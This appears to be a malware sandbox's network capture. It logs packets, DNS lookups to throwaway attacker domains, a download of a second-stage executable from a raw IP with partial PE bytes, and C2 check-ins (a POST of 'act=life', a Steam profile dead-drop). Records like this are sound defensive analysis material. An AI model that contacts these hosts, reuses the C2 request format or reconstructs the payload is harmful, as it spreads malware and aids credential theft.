                                                                                        Nov 14, 2024 08:08:27.488274097 CET44349709188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:27.489535093 CET49709443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:27.489682913 CET49709443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:27.489778996 CET44349709188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:28.032044888 CET44349709188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:28.032260895 CET44349709188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:28.032301903 CET49709443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.032346964 CET49709443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.048449993 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.048506021 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:28.048778057 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.049020052 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.049032927 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:28.660685062 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:28.661336899 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.662235022 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.662249088 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:28.662581921 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:28.664470911 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.664599895 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.664633989 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:28.664853096 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:28.707334995 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:29.329701900 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:29.329958916 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:29.330102921 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:29.330332994 CET49710443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:29.330353975 CET44349710188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:29.425932884 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:29.426013947 CET44349711188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:29.426103115 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:29.426424980 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:29.426440954 CET44349711188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:30.074800014 CET44349711188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:30.074954033 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.082596064 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.082623959 CET44349711188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:30.082937002 CET44349711188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:30.084526062 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.084705114 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.084743977 CET44349711188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:30.084810972 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.084827900 CET44349711188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:30.606743097 CET44349711188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:30.607028961 CET44349711188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:30.607126951 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.607126951 CET49711443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.801289082 CET49712443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.801347971 CET44349712188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:30.801418066 CET49712443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.801903963 CET49712443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:30.801918030 CET44349712188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:31.420839071 CET44349712188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:31.420994043 CET49712443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:31.461370945 CET49712443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:31.461393118 CET44349712188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:31.461853981 CET44349712188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:31.483254910 CET49712443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:31.483371973 CET49712443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:31.483378887 CET44349712188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:31.976754904 CET44349712188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:31.976892948 CET44349712188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:31.976991892 CET49712443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:31.977123976 CET49712443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:31.977140903 CET44349712188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.353662968 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.353709936 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.353780985 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.354091883 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.354108095 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.961669922 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.961765051 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.963088036 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.963099003 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.963448048 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.964566946 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.965342045 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.965379953 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.965465069 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.965512991 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.965631962 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.965702057 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.965806007 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.965842009 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.965961933 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.965996981 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.966114044 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.966145039 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.966156006 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.966173887 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.966269016 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.966294050 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.966312885 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.966413975 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.966461897 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.975641012 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.975789070 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.975826979 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.975856066 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.975991011 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:32.976089954 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:32.976171970 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:35.391227961 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:35.391371965 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:35.391428947 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:35.391495943 CET49713443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:35.391515017 CET44349713188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:35.397764921 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:35.397798061 CET44349715188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:35.397865057 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:35.398262978 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:35.398273945 CET44349715188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:36.007986069 CET44349715188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:36.008105993 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:36.009249926 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:36.009268045 CET44349715188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:36.010062933 CET44349715188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:36.011115074 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:36.011163950 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:36.011215925 CET44349715188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:36.490824938 CET44349715188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:36.490932941 CET44349715188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:36.491095066 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:36.491151094 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:36.491151094 CET49715443192.168.2.5188.114.96.3
                                                                                        Nov 14, 2024 08:08:36.491174936 CET44349715188.114.96.3192.168.2.5
                                                                                        Nov 14, 2024 08:08:36.491187096 CET44349715188.114.96.3192.168.2.5
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 14, 2024 08:08:20.850723982 CET6392553192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:20.898324013 CET53639251.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.079251051 CET5104753192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:22.101927996 CET53510471.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.103876114 CET6259653192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:22.126727104 CET53625961.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.150149107 CET5303553192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:22.172333002 CET53530351.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.173799038 CET5543253192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:22.195878983 CET53554321.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.197366953 CET4930053192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:22.220109940 CET53493001.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.224280119 CET5589853192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:22.246279955 CET53558981.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.258707047 CET5289353192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:22.281380892 CET53528931.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.309757948 CET5135853192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:22.331646919 CET53513581.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:22.365540028 CET6491353192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:22.372437954 CET53649131.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:08:23.976547003 CET4946653192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:08:24.142843962 CET53494661.1.1.1192.168.2.5
                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 14, 2024 08:08:20.850723982 CET192.168.2.51.1.1.10xa021Standard query (0)netwrokenb.cyouA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.079251051 CET192.168.2.51.1.1.10x1fdfStandard query (0)repostebhu.sbsA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.103876114 CET192.168.2.51.1.1.10x1d59Standard query (0)thinkyyokej.sbsA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.150149107 CET192.168.2.51.1.1.10x5d99Standard query (0)ducksringjk.sbsA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.173799038 CET192.168.2.51.1.1.10x9d55Standard query (0)explainvees.sbsA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.197366953 CET192.168.2.51.1.1.10x5c47Standard query (0)brownieyuz.sbsA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.224280119 CET192.168.2.51.1.1.10xee44Standard query (0)rottieud.sbsA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.258707047 CET192.168.2.51.1.1.10x7285Standard query (0)relalingj.sbsA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.309757948 CET192.168.2.51.1.1.10xc038Standard query (0)tamedgeesy.sbsA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.365540028 CET192.168.2.51.1.1.10x4369Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:23.976547003 CET192.168.2.51.1.1.10x2f90Standard query (0)marshal-zhukov.comA (IP address)IN (0x0001)false
                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 14, 2024 08:08:20.898324013 CET1.1.1.1192.168.2.50xa021No error (0)netwrokenb.cyou188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:20.898324013 CET1.1.1.1192.168.2.50xa021No error (0)netwrokenb.cyou188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.101927996 CET1.1.1.1192.168.2.50x1fdfName error (3)repostebhu.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.126727104 CET1.1.1.1192.168.2.50x1d59Name error (3)thinkyyokej.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.172333002 CET1.1.1.1192.168.2.50x5d99Name error (3)ducksringjk.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.195878983 CET1.1.1.1192.168.2.50x9d55Name error (3)explainvees.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.220109940 CET1.1.1.1192.168.2.50x5c47Name error (3)brownieyuz.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.246279955 CET1.1.1.1192.168.2.50xee44Name error (3)rottieud.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.281380892 CET1.1.1.1192.168.2.50x7285Name error (3)relalingj.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.331646919 CET1.1.1.1192.168.2.50xc038Name error (3)tamedgeesy.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:22.372437954 CET1.1.1.1192.168.2.50x4369No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:24.142843962 CET1.1.1.1192.168.2.50x2f90No error (0)marshal-zhukov.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:08:24.142843962 CET1.1.1.1192.168.2.50x2f90No error (0)marshal-zhukov.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                        • netwrokenb.cyou
                                                                                        • steamcommunity.com
                                                                                        • marshal-zhukov.com
                                                                                        • 147.45.44.131
                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549704147.45.44.131805700C:\Users\user\Desktop\nlJ2sNaZVi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:08:17.691899061 CET181OUTGET /infopage/tbh75.exe HTTP/1.1
                                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                                        Host: 147.45.44.131
                                                                                        Connection: Keep-Alive
                                                                                        Nov 14, 2024 08:08:18.529835939 CET1236INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:18 GMT
                                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                                        Last-Modified: Sat, 09 Nov 2024 19:43:55 GMT
                                                                                        ETag: "48400-62680167b1aa2"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 295936
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 05 00 49 a2 2e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c0 03 00 00 c0 00 00 00 00 00 00 f0 8a 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ea eb 03 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 38 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 ed [TRUNCATED]
                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELI.g@`@ 8?0.text `.rdata "@@.dataH\@.CRTB@@.reloc8? @D@B
                                                                                        Nov 14, 2024 08:08:18.529863119 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: D$t(8uxuxuD$D$jP1USWV |$81t$4.]SWut%E.]S4uEu
                                                                                        Nov 14, 2024 08:08:18.529874086 CET1236INData Raw: c4 04 85 c0 0f 84 71 02 00 00 b9 01 00 00 00 89 c3 c7 00 00 00 00 00 c7 40 04 06 00 00 00 89 48 08 e9 55 02 00 00 c7 45 08 00 00 00 00 55 e9 01 01 00 00 89 c7 8b 5c 24 14 50 e8 4d 70 00 00 83 c4 04 39 c3 0f 85 7a 02 00 00 8b 1e 0f b6 2b 55 e8 f7
                                                                                        Data Ascii: q@HUEU\$PMp9z+UptC+UpCuK<:ECt$V@-PWt$6.]SptE.]S}pEuM,)E.]S
                                                                                        Nov 14, 2024 08:08:18.529891014 CET1236INData Raw: cc cc cc cc cc cc cc cc 8b 4c 24 04 31 c0 85 c9 74 09 83 79 04 04 75 03 8b 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 57 56 8b 7c 24 10 31 f6 85 ff 74 29 8b 5c 24 14 85 db 74 21 53 e8 75 6b 00 00 83 c4 04 50 53 57 e8 0a fe ff ff 83 c4 0c 85
                                                                                        Data Ascii: L$1tyuASWV|$1t)\$t!SukPSWtxup^_[L$1tyuASWV|$t)\$t!SkPSWtxup^_[SWV\$|$j.S]ktDCj.SEk
                                                                                        Nov 14, 2024 08:08:18.529896975 CET848INData Raw: 89 34 90 8b 41 04 8b 51 18 89 14 a8 8b 41 10 8b 74 24 2c 89 34 90 8b 41 14 8b 51 18 89 2c 90 8b 41 08 8b 51 18 89 1c 90 ff 41 18 8b 01 89 06 31 c0 eb 14 e8 cc 00 00 00 89 c1 b8 ff ff ff ff 85 c9 8b 4c 24 28 74 08 83 c4 10 5e 5f 5b 5d c3 51 e8 8f
                                                                                        Data Ascii: 4AQAt$,4AQ,AQA1L$(t^_[]Qf$L$$y )!GD$AD$FOtZ#l$D$HQ9uID$PfL$(;$u4$t$t$02fL$0u
                                                                                        Nov 14, 2024 08:08:18.529912949 CET1236INData Raw: 24 2c 00 00 00 00 ff 74 24 10 ff 15 00 00 44 00 83 c4 04 ff 74 24 18 ff 15 00 00 44 00 83 c4 04 ff 74 24 1c ff 15 00 00 44 00 83 c4 04 ff 74 24 20 ff 15 00 00 44 00 83 c4 04 ff 74 24 14 e9 fa fe ff ff cc 55 53 57 56 83 ec 14 8b 29 31 c0 80 7d 00
                                                                                        Data Ascii: $,t$Dt$Dt$Dt$ Dt$USWV)1}"s1{F1{\to"uT$)CPD$74$G4$E4$l$<\u,ES
                                                                                        Nov 14, 2024 08:08:18.530200958 CET1236INData Raw: 10 85 f6 0f 84 56 01 00 00 ba af a9 6e 5e 89 f0 f7 e2 c1 ea 0b 69 c2 b0 15 00 00 89 f2 29 c2 89 d0 eb 52 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 04 24 2b 44 24 0c 01 c5 8b 74 24 04 89 f8 ba 71 80 07 80 f7 e2 89 d3 c1 eb 0f 89 c8 ba 71 80 07 80
                                                                                        Data Ascii: Vn^i)R$+D$t$qqi)i)+4$1$t$rk1TtTtTtT|P;$$rt$)
                                                                                        Nov 14, 2024 08:08:18.530220985 CET1236INData Raw: 00 00 00 29 c7 8b 4e 58 8b 56 5c 39 d7 72 02 89 d7 03 46 74 01 f1 81 c1 72 92 03 00 57 51 50 e8 c8 57 00 00 83 c4 0c 01 7e 58 29 7e 5c 03 be 8c 00 00 00 89 be 8c 00 00 00 8b 46 7c 89 38 83 7e 60 00 74 0b 31 c0 83 7e 5c 00 0f 94 c0 eb 02 31 c0 5e
                                                                                        Data Ascii: )NXV\9rFtrWQPW~X)~\F|8~`t1~\1^_USWV@l$TD$0D$D$(rD$4jD$<2D$jUT$|$T$tu M$1w3F
                                                                                        Nov 14, 2024 08:08:18.530236959 CET1236INData Raw: 89 fb 89 7c 24 14 b9 01 00 00 00 29 f1 89 4c 24 2c eb 1b 90 90 90 90 90 8b 4c 24 2c 41 89 4c 24 2c 83 f9 01 8b 7c 24 14 0f 84 6a 01 00 00 8b 4c 24 54 0f b7 9c 59 72 92 01 00 85 db 0f 84 56 01 00 00 8b 4c 24 18 29 d9 0f b7 f9 39 fd 0f 82 3b 01 00
                                                                                        Data Ascii: |$)L$,L$,AL$,|$jL$TYrVL$)9;t$TT$ 8uT$81^rL$)9T$ 8uT$81tR^rL$)94T$
                                                                                        Nov 14, 2024 08:08:18.530478001 CET248INData Raw: 02 00 00 0f 83 df fe ff ff 81 e7 ff 01 00 00 8d 8f 6a d9 43 00 8b 54 24 04 0f b6 09 66 ff 84 4d d2 83 00 00 0f b7 8c 00 e4 db 43 00 66 ff 84 4d 92 81 00 00 e9 2d ff ff ff c7 45 38 08 00 00 00 8b 55 28 8d 72 01 89 75 28 89 55 2c 81 ff 00 02 00 00
                                                                                        Data Ascii: jCT$fMCfM-E8U(ru(U,jCT$fMCfMEPD$D$TL$@^_[]USWVPt$Fu1>u,F+F@;F$>uF|
                                                                                        Nov 14, 2024 08:08:18.535059929 CET1236INData Raw: 29 c8 3d cc 4c 01 00 72 05 03 4e 74 eb 06 8d 8e 72 92 03 00 89 4e 30 89 0c 24 8d 81 bc 4c 01 00 89 46 34 c7 46 58 00 00 00 00 c7 46 5c 00 00 00 00 8b 46 2c 0f b6 18 0f b6 4e 38 d3 eb 8b 6c 24 1c 88 18 8b 4e 08 31 c0 83 7e 38 08 0f 94 c0 29 46 28
                                                                                        Data Ascii: )=LrNtrN0$LF4FXF\F,N8l$N1~8)F(t~d1^DFHFHC^Dn01u*Fu~<0.N<tV0)B9rN+N@;N$vY7n0~H^D.HN0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549705188.114.96.34436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:21 UTC262OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: netwrokenb.cyou
                                                                                        2024-11-14 07:08:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-11-14 07:08:22 UTC1011INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:22 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=psbkn4id5vv4npa1b0dk5bklgn; expires=Mon, 10 Mar 2025 00:55:00 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZQHWYO%2FwqtRyKMY%2Fo0bIUzC769QSKOiK5oawmZkGBcor2xGQNKDzAhaY3GwyNYbLYdec8Qc2gNQLmeNG19%2FpUuuSk%2F6wecqb3cYzudAo3CqsrFnMPwIFeJ7GQC6F8Qxujo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e252b7b6cbe0baf-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1360&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=2087959&cwnd=245&unsent_bytes=0&cid=2566d13972d4aa21&ts=560&x=0"
                                                                                        2024-11-14 07:08:22 UTC9INData Raw: 34 0d 0a 66 61 69 6c 0d 0a
                                                                                        Data Ascii: 4fail
                                                                                        2024-11-14 07:08:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.549706104.102.49.2544436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:23 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Host: steamcommunity.com
                                                                                        2024-11-14 07:08:23 UTC1917INHTTP/1.1 200 OK
                                                                                        Server: nginx
